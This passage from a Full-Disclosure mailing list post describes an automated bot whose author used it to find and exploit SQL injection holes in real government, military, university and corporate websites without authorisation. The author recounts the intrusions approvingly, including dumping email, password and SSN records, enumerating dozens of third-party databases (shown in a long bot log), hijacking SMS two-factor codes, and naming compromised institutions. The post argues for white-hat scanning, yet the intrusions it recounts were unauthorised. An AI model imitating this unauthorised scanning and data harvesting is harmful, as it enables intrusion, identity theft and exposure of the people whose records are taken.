Well... I guess if no other automated penetration bot trespassed the
company's database area last month - it was quite probable that this message
was meant explicitly for the Bot.
The second, disturbing part of the case was the fix itself. Althought in
fact the faulty 'customer login' interface has been patched, it took about
60secs to find another penetration entrypoint - vulnerable 'password
forgotten' FORM. After redirecting the Bot to the new entrypoint it
harvested all the DOP configured data successfuly, while taking it to heart
to "go away" from the 'Customer Login' interface, and to never, ever, use
this entrypoint again while penetrating this particular system.
Some time later, I did try to analyse a random group of previously
penetrated and vuln-matched systems selected from the Bot's printouts. It
seems that approximately 8 out of 10 database systems that 3-6 months
earlier had been scanned, penetrated and data-harvested either did not fix
the hole, fixed it inproperly or didn't take an effort of wide-scanning
whole web app for other similar attack vector vulnerabilities.
Since NONE of the Bot penetrated system owners were ever informed about the
successful/unsuccessful compromise attempt of their systems, these numbers
would only indicate that either intrusion detection infrastucture or
incident response procedures in the penetrated institutions leave a great
deal to be desired.
A very similar example, to one in security training corp's case, was an
Australian telecomunication company system providing commercial anonymous
SMS services. Identified over 6 months earlier as vulnerable by the first
version of bot and opened for client sensitive information theft as well as
client SMS credit limit manipulation / SMS service exploitation, it was
completely rebuilt now (it had that whole new, sharp-looking graphic
design). Entire web page frontend style was changed and the SQL Injection
hole within the 'Logon' interface has been properly patched. However, just
as in the previous case the 'Password Reminder' service was left with the
very same kind of ASP based SQLi hole that the 'Logon' interface contained
before, opening back the whole database system for R/W access.
It could only suggest again that the whole attack vector case based on SQL
Injection may be sometimes either wrongly understood by the web application
developers, or based too much on shortsighted "how to hack web apps in
60secs" tutorials (defining methods how to crack a system, not how to
protect from being cracked), that sometimes could, in fact, be understood in
the way: "If you secure properly just your ASP web application's LOGON
interface then you are all secure against any SQL Injection, because ASP SQL
Injection <IS> just login based".
17. Enumerating Penetration Entrypoints
///////////////////////////////////////
One of main goals of the research was to establish the numbers behind every
particular victim-pattern, using different, automated, search engine query
generators. Three generators were constructed, respectively for standard,
long time exploited 'Login' interface, then 'Forget Password' interface and
finaly 'User Registration' interface.
The Bot gathered data analysis shows approximately low positive counts
(target web systems matched as vulnerable) for the plain "login.asp"
tutorials-case-pattern, higher for patterns like "logon.asp", "log_in.asp",
"signin.asp", "log_me_in_god_damnit.asp" or their permutations and finaly
the highest for "register.asp" and "forgotpassword.asp".
The last group - password reminder web interfaces - was for example
statisticaly the most successful way to compromise a government owned
database servers.
There seems be at least two main reasons behind these numbers: kind of
misunderstanding of the nature of common SQL query execution and echo of
malicious "penetration storms" sweeping through the database systems for the
past decade.
Well documented algorithms to search and quickly-exploit, like "login.asp"
googling and infamous "'or 1=1" sequence used as authorization bypass magic
word, might have been more actively used by script-kiddies and automated
scanning codes that followed that search pattern. After such
script-kiddie-conducted attacks (with usually malicious/destructive
purposes, but lower effort goals) the compromise effects were usually quick
noticable, rendering a rapid victim's reaction (detection/patching), as the
impact of the attack was either database contents alteration or destruction.
Therefore most of the systems following the tutorial-described patterns have
already their unfriendly pen-testing all behind and so the final positive
count in that group is statisticaly lower.
You could tell that most of programmers standing behind the systems
belonging to the critical infrastructure group are perfectly aware of the
Sqli attack threat as well as of its possible impact to a system. Many of
those systems that have been found vulnerable to the attack vector had well
employed validation for almost every submitted data field, having also some
sort of "scarecrow" for script-kiddies bonus addition, leaving however
unescaped properly one or two other substantial interfaces that employed a
client-to-server input flow. These unnoticed connections between the user
input and server-side command execution, left in different cases the
particular company's web infrastucture opened to penetration.
A quite funny coincidence happened shortly after the begin of testing of the
first query generator (the 'login' interface name permutation generator).
Bot's S1 logged by mistake a YouTube movie link, indicating that it matched
a '"login.asp"+video' potential HTTP system target pattern. Nothing
surprising there however, since the movie contained a tutorial to SQL
Injection driven MSSql server attack. The description of the video added by
the uploading user contained fraze "login.asp", therfore it has been indexed
by google robots and found by the Bot. Ironicaly however, the tutorial
instructed that there is no value in searching for the SQL Injection victim
to look for any other interfaces that system administration login frontends
as they are the only possible way to compromise the system. Since we already
know that the possible remote system SQL command execution may be triggered
at any server-side user input processing interface, obviously needless to be
admin-login portal or moreover to be login interface at all - this finding
of the Bot wasn't afterall a false-positive :)
The second most often place to find command injection vulnerabilities was
"user registration" interface. Web application programmer needs to implement
the comparison of the users provided application unique user identificator
(USERNAME/EMAIL/AgencyID) with the ones already exisiting in DB, and display
an error message if needed. Since the only possible way to do this is by
employing an SQL query, another possible entrypoint type was introduced into
the Bot's code.
A perfect example is one of U.S. Department of Agriculture (USDA) database
systems with well designed code employing illegal character filtering at
main login interface - even warning the user about any recognized SQL
Injection attempt.
But again - the User Registration interface designed for U.S. based
companies doesn't properly check its User ID field - the server side code
does not escaped the user's special character input before comparing the
proposed ID value with the ones already stored in database to check for
possible repetition - rendering the system exploitable through the attack.
An interesting different type of Sql Injection "pin-point" was spotted by an
accident during early phase of the research.
First version of the Bot have found a hole in major Polish commercial email
portal. Few hours after the system has been probed matching it vulnerable by
Bot's S2 and handed over to penetration worker-queue for further database
contents scanning and DB structure enumeration, the vulnerabiblity has been
patched. Unfortunately S2 didn't manage to gather any additional info about
the database structure and contents, because all its workers were busy at
the time.
After I've noticed that particular system penetration some time later while
analysing Bot's few days logs, together with a friend we decided to "check
out" if the company's programmers didn't miss anything...
After an hour or less my friend noticed (thx Sl4uGh7eR, btw) that
concatenating an apostroph with the '.asp' file name within the browser URL
will produce a HTTP 500 error containing our favourite MsSql 0x80040e14
syntax error. Now the only question remaining was why?
After quick investingation the case became quite clear - the remote server
application was employing mechanism to validate every client's HTTP file
request, coding it to match against database stored dynamic list of files
that a user is allowed to request.
Since such code needs obviously to match the filename requested by a
particular HTTP/GET against the ones stored within the database - it also
needs to execute somewhere a proper SQL query command containing client-side
provided URL string, that unescaped correctly is all the attacker needs.
And so the Bot gained another, third HTTP based SQL Injection pin-point type
implemented, aside HTTP/POST based Html FORM varialble fuzzing and HTTP/GET
parameters fuzzing.
But the the cat-mouse play continued. A week after the last friendly
pentesting the hole has been patched, missing again however the point on the
issue and enabling an intruder to perform successfuly a Blind Sql Injection
attack. For this project objectives was obviously not the ravage and server
take over - just a research, numbers and the attack vector mutation
possibilities (and lowering also a little my ignorance to SQL language) -
after implementing new vulnerability testing pinpoint type into the Bot I've
decided to close the case of the Polish hosting company.
It came back to me, however, quite quickly.
The first bot version which spotted the vulnerable company's system didn't
have implemented a crucial feature yet - enumeration of every OTHER
databases (not just the one that has been queried by the vulnerable ASP
script code) hosted at the DB server that could be accessed through the
vulnerable web interface.
The feature was implemented later in the last major Bot's version. During
the final month-long runtime it spotted a minor vulnerable website's
database, provided for Polish barbers industry. After enumerating all the
other accessible databases on that vulnerable MSSQL server using same
db-user account as for the barbers portal login interface, amazingly, it
came out that the server is the VERY SAME db-server belonging to the
previous major Polish hosting company, hosting 94 other R/W accessible
databases, including for example the biggest Polish international cycling
racing event website - "Tour De Pologne".
Since all the server hosted databases were aministrated and serviced by that
single hosting company, all of them were protected by the SAME db-user
account, rendering R/W accessible every database hosted there through that
single minor barber portal - including WWW/FTP customer account credential
database, company financial operations database (customer credit card data),
and so on.
It should be also mentioned - even if its too obvious - that SQL Injection
vector attack does not have to be even HTTP protocol based. Vulnerability
could be exploited connecting at any kind of user data entrypoint (protocol)
designed to transport the input to the remote client/server application for
final processing. No matter what happens, implementing proper 'processing'
of that input at server's side is the key to stay secure or to get
compromised in future.
18. Obscurity != Security
/////////////////////////
"If it runs, it can be broken" - every software protection cracker's
favourite fraze. It's quite simple actually - every locally runnable code is
reverse-engineerable and can be re-sculpted into anything else, limiting the
possibilities just to cracker's imagination.
The same rules applies to client-side-only web app protections and code
obfuscation.
Interesting observation was made during the bot's runtime and afterwards -
analysing the vulnerable system entrypoints list. It seems that many of
heavier client-side protected web applications that has been in turn matched
as penetrable by the bot were either a government or military systems. And
to be clear: by "heavier" I meant here approximately higher ammount and
sophistication level for the code responsible for the CLIENT SIDE user input
validation.
For example, the second version of bot found and penetrated quite old but
still operational DoD owned system belonging to one of US Air Force
contrators - Lockhead Martin.The JScript code there employed really annoying
for an attacker, timer-based input validation protection. "Annoying" of
course for a human attacker with browser scripting turned on... :)
To try to disable the input validation timers manualy, using just for
example FireFox FireBug plugin would be a real pain in the ass, as the timer
validation procedures were embeded into different HTML tags and
cross-triggered each other causing the loss of FF's input focus after every
inproper character pressed (btw: huge applause for their programmers
imagination).
>>From the bot's perspective however (ie: from its "handicapped"
robot-perspective), the whole JS code built by the system's programmers is
pretty irrelevant - just as the bot doesn't employ any JS engine to execute
the retrieved HTML scripts searching directly in the HTML and its subframes
for every submitable FORM tag - this validation code was simply an excessive
piece of HTML encoded text. After matching the system as positive against
SQL Injection, the bot built and stored the penetration entrypoint
description. Right after that, S2 successfuly penetrated it and dumped about
3K Email/Pwd/SSN record entries of US AirForce cadets and officers.
Every client side software protection providing input data validation can be
reversed and disabled.
Thus, the input filtering on the server side IS A MUST to be implemented in
any secure web app. Employing client-side FORM field data validation in
search for invalid characters - has no bigger value as a security mechanism.
Obviously, it serves very well as data syntax validity double check
mechanism as well as the first line of defense from annoying script-kiddies
(like me for example:) typing one magic injection word into every queried
google link looking for a single-hit "world domination" internet doors.
Using tools built for browser-side session data manipulation, like FireBug
plugin for FF or WebScarab http-proxy tool, one can quickly bypass
protections of this kind. Specifically, automated internet robots, using own
HTTP-payload processing, can do with the client side script code pretty
anything that bot's programmer wished them to do - ranging from validation
code autodetection up to selective execution.
On the other hand, one good way to stop a fully automated robot
(vulnerability probing robot) on his web-app crawling/scanning road would be
captcha implementation. Robot code behaves as blindfolded as only a machine
can. Of course business-time counsuming implementation of additional anti
robot functionality like this without focus on true bottom of the issue, ie.
the application security assessment, would be shortsighted. Obviously, while
captcha won't stop any human auditor conducting precise web-app pentesting
ordered by a customer company, it will definitely stop a robot from either
full enumeration of the web-app interface or progression with specific
interface fuzzing process.
Another interesting, yet still powerless protection facing an SQL Injection
vulnerability was an SMS based 2-factor web authentication solution,
implemented by one of Johanessburg based Colleges, which handled parent
authentication logon to the child education progress monitoring system.
Bot in its early second version tracked down the vulnerability, accessing
without any trouble sensitive ID data belonging to both students as well as
their parents (email/password combos, names, phones). Despiting a certain
threat of ID theft and mailbox hijacking by criminals, the SQL Injection can
be used here in a quicker way to manipulate the SMS phone number records to
gain unathorized access to the system.
The authentication implemented there had two steps.
At the first one parent was asked to provide its Parent_Code, ID_Number,
Email_Address and Password. Then, using the database stored (at
registration) phone number, server-side application sent a special security
code on that phone number and asked the user to enter the code at the second
logon screen, before giving him the access to the monitoring services.
Exploiting however the R/W access to a database records, a malicious entity
can easily change any particular parent phone number to the desired one,
redirecting in result the SMS containing the Security Code.
19. Learning new tricks from your own code
//////////////////////////////////////////
Shortly before the end of the final Bot's testing month, during some early
october morning it found an entrypoint into the vulnerable HP customer
support web database. Since the tool was running silently without my
supervision (the time of the initial system's vulnerability match followed
by an automated penetration was something like 4AM here in my country, while
I was sleeping deliciously), over a week has passed until I've decided to
look over the recent data gathered by the Bot.
When I've spotted the HP penetrated system's printout in tool's output logs
my attention was attracted by the list of databases stored on that DB
server. It contained Intel's, Amd's, HP's as well as about 20 other "bigger"
company customer databases. It seemed that the server belonged to some IT
outsourcing company which offered its customers DB-Server hosting services.
Unfortunately all I've had before me was the server's sub databases name
list and its structure - it seemed that the Bot didn't recognized any
potentialy "interesting" (DOP specified) data on the server (at the time it
was configured to look only for login/email/password combos) so it did not
"decide" to perform further data-harvest. Still, after quick human analysis,
it seemed that some of the accessible databases contained tables with column
names suggesting sensitive customer information. Obviously I must have done
a quick "manual" check to be sure :)
Launching web browser -> copy-pasting vulnerable system URL -> entering
manualy SQL query sequence into the input field enumerated earlier by the
Bot and ... here goes nothing. Ehmmm.
Has the system been patched already?
Well. Uhmmmmmm. OK.
Good for them.
The guys did their job well and patched the system after noticing Bot's
friendly "pentesting visit" last week.
So I thought...
First of all you must agree that the teaching-dependency-line linking the
programmer with his penetration testing robot is rather unidirectional :)
I mean, it is the coders duty to learn the code enough tricks he know in
order to create automated attack robot. In other words - the vulnerability
recognition errors are meant to be more like domain of machine - not the
human. So if you code a program telling him how to enumarate and penetrate
the system, then the code finds a system and says - "I've matched an
entrypoint to the database at web interface X" - and some time later you try
to access the database manualy at the very same entrypoint specified by the
code but nothing happens... the answer is obvious: the system has been
patched. Right ?
In other words: it couldn't have been you - the teacher - who made a mistake
validating the entrypoint's security, while all the tricks the code knows
are your tricks ... :)
But that was a system hosting databases of Intel, Amd and Cisco...
I mean, you just have to be sure to sleep well, if they didn't fix just one
particular entrypoint leaving another one unpatched. Quick checking all the
other input fields, password reminder interface, sumbmit new account
interface, website search interface - nope. Nothing. The vuln has been
fixed.
So the last thing (but you could say - completely unnecessary - basing on
what has been said earlier) was to order the bot to target the system again
and repeat the penetration test from a week before. So, we launch the
config, clear the "pen-test-done" flag by the systems url entry and wake the
Bot.
20091128125443 Initializing Ellipse 0.4.73 SEG-2
20091128125443 Cleaning up abandoned VlnConn targets...
20091128125505 Op mode: 0
20091128125505 Mutex ID: VLNDET-MTX-001
20091128125505 Entering MainLoop...
20091128125525
20091128125525 [ SYSTCH ] Connecting system at >>
20091128125525 [ SYSTCH ] http://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
20091128125525
20091128125528 [ SEG2 ] Initializing Entrypoint Search...
20091128125528 [ SEG2 ] Entrypoint #1 found
20091128125528 [ VLNCONN ] Going processing level: 0x20
20091128125528 [ VLNCONN ] Running initial passive vuln detection...
20091128125534 [ VLNCONN ] Passive-Scan result: Negative
20091128125534 [ SEG2 ] Entrypoint #2 found
20091128125534 [ VLNCONN ] Running initial passive vuln detection...
20091128125538 [ VLNCONN ] Passive-Scan result: POSITIVE
20091128125538 [ VLNCONN ] Going processing level: 0x21
20091128125538 [ VLNCONN ] Running active vuln detection...
20091128125543 [ VLNCONN ] Scan result: POSITIVE
20091128125543 [ VLNCONN ] Going processing level: 0x25
20091128125543 [ VLNCONN ] Running primary query element scan...
20091128125543 [ VLNCONN ] BaseQuery column extracted:
hp_support_reg_AU.sPassword
20091128125556 [ VLNCONN ] Going processing level: 0x26
20091128125556 [ VLNCONN ] Validating query item count...
20091128125556 [ VLNCONN ] Validation Succeeded
20091128125556 [ VLNCONN ] Validating Mode2DatAccess...
20091128125557 [ VLNCONN ] Mode2DatAccess Enabled
20091128125557 [ VLNCONN ] Going processing level: 0x3A
20091128125557 [ VLNCONN ] Scanning global DB Names ...
20091128125557 [ VLNCONN ] DB #000: hp
20091128125558 [ VLNCONN ] Accessible
20091128125558 [ VLNCONN ] DB #001: master
20091128125558 [ VLNCONN ] Accessible
20091128125559 [ VLNCONN ] DB #002: tempdb
20091128125559 [ VLNCONN ] Accessible
20091128125600 [ VLNCONN ] DB #003: model
20091128125600 [ VLNCONN ] Accessible
20091128125601 [ VLNCONN ] DB #004: msdb
20091128125602 [ VLNCONN ] Accessible
20091128125602 [ VLNCONN ] DB #005: pubs
20091128125602 [ VLNCONN ] Accessible
20091128125603 [ VLNCONN ] DB #006: Northwind
20091128125603 [ VLNCONN ] Accessible
20091128125604 [ VLNCONN ] DB #007: intel_collateral
20091128125604 [ VLNCONN ] Accessible
20091128125605 [ VLNCONN ] DB #008: vishay
20091128125605 [ VLNCONN ] Accessible
20091128125605 [ VLNCONN ] DB #009: milieu
20091128125606 [ VLNCONN ] Accessible
20091128125607 [ VLNCONN ] DB #010: seagate
20091128125608 [ VLNCONN ] Accessible
20091128125608 [ VLNCONN ] DB #011: dbSanDisk
20091128125608 [ VLNCONN ] Accessible
20091128125609 [ VLNCONN ] DB #012: hp
20091128125610 [ VLNCONN ] Accessible
20091128125610 [ VLNCONN ] DB #013: dbInFocus
20091128125612 [ VLNCONN ] Accessible
20091128125612 [ VLNCONN ] DB #014: intel
20091128125613 [ VLNCONN ] Accessible
20091128125613 [ VLNCONN ] DB #015: BMC
20091128125614 [ VLNCONN ] Accessible
20091128125614 [ VLNCONN ] DB #016: dbInFocusPP
20091128125614 [ VLNCONN ] Accessible
20091128125615 [ VLNCONN ] DB #017: dbInFocusSC
20091128125615 [ VLNCONN ] Accessible
20091128125616 [ VLNCONN ] DB #018: snc
20091128125619 [ VLNCONN ] Accessible
20091128125619 [ VLNCONN ] DB #019: SANDISK_POP
20091128125620 [ VLNCONN ] Accessible
20091128125620 [ VLNCONN ] DB #020: dbIntel
20091128125620 [ VLNCONN ] Accessible
20091128125621 [ VLNCONN ] DB #021: Nokia
20091128125621 [ VLNCONN ] Accessible
20091128125622 [ VLNCONN ] DB #022: dbShowcase
20091128125623 [ VLNCONN ] Accessible
20091128125624 [ VLNCONN ] DB #023: dbPMG
20091128125624 [ VLNCONN ] Accessible
20091128125625 [ VLNCONN ] DB #024: AMD
20091128125625 [ VLNCONN ] Accessible
20091128125625 [ VLNCONN ] DB #025: Purina
20091128125627 [ VLNCONN ] Accessible
20091128125627 [ VLNCONN ] DB #026: AMD_TEST
20091128125628 [ VLNCONN ] Accessible
20091128125628 [ VLNCONN ] DB #027: TEST_dbInFocusSC
20091128125629 [ VLNCONN ] Accessible
20091128125629 [ VLNCONN ] DB #028: TEST_InFocus
20091128125630 [ VLNCONN ] Accessible
20091128125631 [ VLNCONN ] DB #029: STB
20091128125631 [ VLNCONN ] Accessible
20091128125631 [ VLNCONN ] DB #030: BackupAwareness
20091128125632 [ VLNCONN ] Accessible
20091128125632 [ VLNCONN ] DB #031: nvpc
20091128125633 [ VLNCONN ] Accessible
20091128125633 [ VLNCONN ] DB #032: dbCisco
20091128125634 [ VLNCONN ] Accessible
20091128125634 [ VLNCONN ] DB #033: tUserLogin_bak161105
20091128125635 [ VLNCONN ] Accessible
20091128125635 [ VLNCONN ] DB #034: jackson
20091128125635 [ VLNCONN ] Accessible
20091128125636 [ VLNCONN ] DB #035: Michelin
20091128125639 [ VLNCONN ] Accessible
20091128125640 [ VLNCONN ] DB #036: dbMcAfee
20091128125640 [ VLNCONN ] Accessible
20091128125641 [ VLNCONN ] DB #037: PMG_VA
20091128125641 [ VLNCONN ] Accessible
20091128125641 [ VLNCONN ] DB #038: MCSoptimizer
20091128125642 [ VLNCONN ] Accessible
20091128125642 [ VLNCONN ] DB #039: Maxtor
20091128125643 [ VLNCONN ] Accessible
20091128125644 [ VLNCONN ] DB #040: Xtentia
20091128125645 [ VLNCONN ] Accessible
20091128125645 [ VLNCONN ] DB #041: NokiaLetsNetwork
20091128125646 [ VLNCONN ] Accessible
20091128125646 [ VLNCONN ] DB #042: Print_Optimizer
20091128125646 [ VLNCONN ] Accessible
20091128125647 [ VLNCONN ] DB #043: GiftShop
20091128125647 [ VLNCONN ] Accessible
20091128125648 [ VLNCONN ] DB #044: GiftShop_en
20091128125648 [ VLNCONN ] Accessible
20091128125648 [ VLNCONN ] DB #045: dbOrderingTool
20091128125649 [ VLNCONN ] Accessible
20091128125649 [ VLNCONN ] DB #046: SingHealth
20091128125650 [ VLNCONN ] Accessible
20091128125650 [ VLNCONN ] DB #047: Watson_Wyatt
20091128125651 [ VLNCONN ] Accessible
20091128125651 [ VLNCONN ] DB #048: VATest
20091128125652 [ VLNCONN ] Accessible
20091128125652 [ VLNCONN ] DB #049: seagate_sdvr
20091128125653 [ VLNCONN ] Accessible
20091128125653 [ VLNCONN ] DB #050: HM
20091128125653 [ VLNCONN ] Accessible
20091128125654 [ VLNCONN ] DB #051: dbVirtualAgency
20091128125654 [ VLNCONN ] Accessible
20091128125655 [ VLNCONN ] DB #052: Seagate_Xmas
20091128125655 [ VLNCONN ] Accessible
20091128125657 [ VLNCONN ] DB #053: Seagate_CNY
20091128125657 [ VLNCONN ] Accessible
20091128125658 [ VLNCONN ] DB #054: SeagateCM2
20091128125658 [ VLNCONN ] Accessible
20091128125658 [ VLNCONN ] DB #055: SeagateSecuTecheInvite
20091128125659 [ VLNCONN ] Accessible
20091128125659 [ VLNCONN ] DB #056: ICG
20091128125700 [ VLNCONN ] Accessible
20091128125700 [ VLNCONN ] DB #057: SeagateCM2_China
20091128125701 [ VLNCONN ] Accessible
20091128125701 [ VLNCONN ] DB #058: IntelServerConfig
20091128125702 [ VLNCONN ] Accessible
20091128125702 [ VLNCONN ] DB #059: SeagateCM2_Korea
20091128125703 [ VLNCONN ] Accessible
20091128125704 [ VLNCONN ] DB #060: IntelServerConfigTest
20091128125704 [ VLNCONN ] Accessible
20091128125705 [ VLNCONN ] DB #061: SeagateCM2_Taiwan
20091128125705 [ VLNCONN ] Accessible
20091128125706 [ VLNCONN ] DB #062: SeagateCMS
20091128125706 [ VLNCONN ] Accessible
20091128125707 [ VLNCONN ] DB #063: dbNSNCafe
20091128125707 [ VLNCONN ] Accessible
20091128125707 [ VLNCONN ] DB #064: SCMS_XDB
20091128125708 [ VLNCONN ] Accessible
20091128125708 [ VLNCONN ] DB #065: SCMS_AU
20091128125709 [ VLNCONN ] Accessible
20091128125710 [ VLNCONN ] Scan done -> 66 total DBs found
20091128125710 [ VLNCONN ] 59 accessible DBs found
20091128125710 [ SEG2 ] Vuln Connection Done.
Well...
Uhmmm....
Ok.
What the F**K is going on...
Bringing back FF, locating manualy the 2nd entrypoint specified in the Bot's
logs and ... It seems that it's "Forgotten Password" interface - the very
same FORM that the Code penetrated the system through before. Manual
injection -> not a single MSSQL error. Maybe it's within some hidden text
area or in background color - anything that I could have missed.
Nope.
The HTML source is clear. Not a single ASP db-error string.
Now, this is the moment I guess a programmer lives for :)
To feel weak and stupid in front of the code you have just written.
It seems that afterall one can learn a new tricks from his own code. After
quick debugging session and watching the code as it runs through the
vulnerability matching steps the case was solved.
The reason behind that the code could have successfuly penetrated the system
and I couldn't was the Bot's bug (oh yeah...) that I left while coding the
bot's HTML parser. The parser implementation I adopted from one of my
previous projects (the Ogame robot) did not have the rule to evade properly
any HTML code within escapement seqences. Actually, it was coded in, but the
minor true/false logic bug prevented it from execution.
The vulnerable "forgotten password" FORM was indeed vulnerable. But not the
one rendered by the browser.
The one tracked and targeted by the code was also a "forgotten password"
interface but it had a different FORM's 'action' URL-path parameter and lay
entirely within one of the HTML commented areas. It seems that some web
programmer with really sharp sense of humour patched that earlier vulnerable
interface, gave it a new 'action' param path leading to a new secure code
interface but not only didn't remove the other vulnerable interface from the
server side ASP code but also left the old vulnerable FORM leading directly
to the remote interface just commented within the HTML code.
Anyway. A buggy bot code, helped the penetration S2 code to find completely
different application's bug.
You simply LIVE FOR these tiny, ironic moments.
20. SIDECAM Robots vs. Honeypots And Attack Vector Recognition
//////////////////////////////////////////////////////////////
Every time an attack vector evolve one can design and implement a proper
diversion/IDS facility - a honeypot.
Now, since I was focused in general on ID theft attack scenario driven by
SQL Injection based mailbox credential matching, one could construct a
solution trained to recognize such attack in progress, track its propagation
and with some luck tell us something more about the remote entity, that
originated the attack and/or actively exploits the stolen data.
For a specialized, SIDECAM-bot autodetection framework we would need at
first to spread the smell of honey far away, ie. to be highly visible for
automated google-driven target seekers.
A proper positioning combined with building in most common SQL Injection
entrypoint patterns (lets narrow it down just to ASP for now) - like the
unfamous "login.asp" scheme for example, plus certain "data sensitivity
flavour" to taste good (lest say something more critical than a sperm-bank
customer database) - that should do the trick.
When attracted to our phony target, the attackers S2-equivalent code should
find easily the email/password record entries crafted and left there by us.
These mail accounts prepared specialy for the attack IDing purposes could
then be robot-monitored by the honeypot framework - any valid mailbox
credential login will indicate a SIDECAM attack vector exploitation in
progress.
21. Compromised
///////////////
The list below contains selected, non-detailed, most critical vulnerable
institutions' systems, identified by the Bot during whole research, in some
cases opening penetration paths to several different organizations /
companies systems.
Some of them might have been patched since the initial vulnerability match,
some might have been shutted down.
>>From the reasons that have been mentioned in the first paragraph, neither
links nor any further details will be disclosed publicly.
Vulnerable educational organization systems:
- University of the South Carolina, (multiple entrypoints)
- Bulgarian Svishtov Economic University,
- Cracow Jagiellonian University, medical sciences department system
- California State University, student health web service
- University of Washington,
- University of Minnesota,
- Truman State University, (multiple entrypoints)
- Hunter College,
- Dallas Baptist University, graduate admissions system
- University of Arkansas for Medical Sciences
- Association for Information Systems database
Vulnerable government institution systems:
- Argentina Ministry of Foreign Affairs system,
- UK Vehicle Certification Agency system,
- UK Vehicle & Operator Services Agency system,
- Arizona Department of Transportation system,
- California Department of General Services, Online Fiscal Services system
- California Department of Education system,
- California Tax Education Council system,
- California Department of Justice (3 separate systems)
- Florida Department of Financial services system
- Colorado Department of Personnel and Administration system
- Maryland Information Technology Advisory Council system,
- District of Columbia Public Service Commission (multiple penetration
entrypoints)
- Arizona Information Technology Agency system,
- U.S. Department of Transportation maritime service system,
- Texas Department of Justice system,
- Federal Mediation & Conciliation Service,
- Alberta (Canada) Advanced Education and Technology service,
- Georgia gov-job portal database,
- Georgia Financing and Investment Commission system,
- City of Grove City (Ohio), contractor application database,
- Geary County (Kansas) Gov Taxing web serivce,
- Sarpy County (Nebraska),
- Sawyer County, electronic taxing / land administration web system,
- Fauquier County (Virginia), county's goverment eNotification system,
- San Bernardino County web system, Purchasing Department Administration
system,
Vulnerable US Department of Defense systems (including contractors and
subcontractors):
- Rock Island Arsenal U.S. Army database system,
- U.S. National Defense University system,
- Jacobs Dougway (DoD and NASA contrator) performance and reporting system,
- DoD Severely Injured Service Member system,
- DoD Health Services Evaluation system,
- DoD troops civil carrer database ("Troops To Teach"),
- Lockheed Martin, (multiple entrypoints),
- U.S. Defense Logistics Agency system - defense fuel energy services
system,
Vulnerable Financial institution systems:
- International Monetary Fund system
- U.S. National Association of Corporate Directors system,
- American Economic Association system,
- Global Banking "employer only" job board web system,
- Employee Stock Ownership Plan database,
- Mortage Bankers Assoc of New York system,
- American Society for Training & Development system,
- International Fund Research Corporation database,
- numerous financial advisory companies and institutions
Vulnerable security companies and organizations:
- US based international security / law enforcement / private investigation
company
- Private Investigators Portals database,
- Private detective, crime, security and software community portal database,
- Retired military officers job portal, entrypoint gives R/W access to other
800+ databases,
- Associated Security Proffesinals (ASP) system
Vulnerable aviation and space systems:
- German Aerospace Center subsystem,
- International aerospace company providing equipment and airline
information services,
- Canadian airline ticket centre system,
- Air Traffic Control Global Events, air traffic security conferences
database system
Vulnerable health organizations systems:
- US Department Of Health, Disaster (hurricane) response online service,
- US Department of Health and Human Services University, learning platform
participant database,
- US Center for Disease Control and Prevention (CDC),
- National Association of Clean Water Agencies / Water Enviroment Research
Foundation jointventure
- International company providing validation services for pharmaceutical,
biotechnolgy and medical device industries,
- US Nationswide Drug Testing Services Company,
- French Association of AntiAge and Estetique Medicine,
- International health recruitment database,
- Cleveland Clinic Center for Continuing Education,
Miscleneaous vulnerable systems:
- 160 million hits per month global basketball portal for player promotion
and exposure,
- One of Polish commercial email/web hosting company database,
- Rediff Portal system's database,
- an online-casino client account database,
- Computer share governance services,
- National Geographic's expeditions alliance company,
- An advertising network database system, serving 9 Billion ads on 1500+ web
sites per month,
- Fuji client eSupport database,
- Dialogic corporation (IP, wireless and video solutions) client support
database,
- Nestle corporation's database, Employee Benefit & learning subsystem,
- Australian business electronic messaging (SMS/MMS) provider,
- Event organizing and publishing company with 60+ yrs experience,
- Brasilian VoIP provider, client account database,
- International casting resource database for professional actors,
- few web hosting companies, including small and large business clients.
- numerous dating portals, including one major dating web engine,
- recruitment companies and job portal client databases (29 systems),
including IT, health, law-enforcement and ex-military.
22. return -1
/////////////
I think there is no doubt that the process of search for the victim, seeking
for vulnerable systems containing credit card numbers along with their CVV2
codes, matching further system penetration entrypoints - even the whole
process of an intrusion and subsequent system penetration: everything can be
parametrized, mathematicaly described and finally automated using two
things: a programming language and a machine. I guess, everybody's familiar
with the fraze: the word is stronger than the sword, right? Well, I must say
that sometimes I like to feel DWORD is twice stronger :)
Although different "friendly" robot-codes exist out there, helping us round
the clock, like for example HTTP web crawlers building google search, there
are also the bad guys. Obviously, the very same automation is being actively
exploited by criminals to track the vulnerable faster and to exploit them
quicker.
There is one more important thing to note about the whole project. As
probably everyone has already noticed :) the whole Bot code DOES NOT
implement any miraculous, new, 0day attack vector "discovery" - it's just a
PLAIN combination of few human and software vulnerabilities which are just
as old as probably the internet itself (password reusing, email credentials
matching, script engine code injection). There are HUNDRETS of more advanced
and more sophisticated automated and semi-automated tools and scripts doing
probably better their job in comparison to every single particular Bot's
part (segment) alone. The main target of this research was however the FULL
automation, ie. binding all the "penetration phases" together and limiting
as much as possible the human factor in the seek-probe-penetrate-analyse
sequence.
In my opinion, the most disturbing observation of the research is the fact
that the results can be accomplished easily by anyone out there just bored
enough - sitting in home, after or in between a dailight job and/or without
a budget. The question is: what are the capabilities of a potential criminal
entity WITH the budget, unlimited research manpower and malicious goals. It
would be really shortsighted to say that a fully automated codes of this
kind - but emploing few times wider range of protocols and targeting
different server side compromise technologies - aren't operational for a
long time and under control of the darker shade underground.
Nevertheless, it's pretty obvious: one can not implement a PERFECT
protection for our personal secret data - as we are the only holders and
protectors of that secrets each other - all we can do is to EDUCATE, how to
build them strong and handle them safely. Though, I guess it would be nice
to see some movement around automated and semi-automated robot code projects
implemented and operated by white hats this time, ACTIVELY targeting places
that seriously weaken the global information infrastuture and open the
users' personal ID information for theft.
I mean, the banks are are obliged to protect the money of their customers by
following specific protocols which are developed and validated externaly
through apriopriate audit procedures, right?
Is it then a hard one, to imagine an automated or semi automated system,
working more or less like a country-wide cyber security sonar, that would be
able to pinpoint and instantialy alert apriopriate response/tech-support
organizations, about those specific "identity data bank" web applications
and systems which CAN'T and WON'T protect our sensitive secrets - passwords,
keys, CC data and IDs?
And all because of a single programmers flaw, which exploited by an attacker
compromises our electronic security instantly.
Anyway, theory is one, reality is another...
Thx and Greetz: SIN, Sl4uGh7eR, Vo0, Andrui, Mario, Rothrin.
By porkythepig.
porkythepig@...t.pl
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
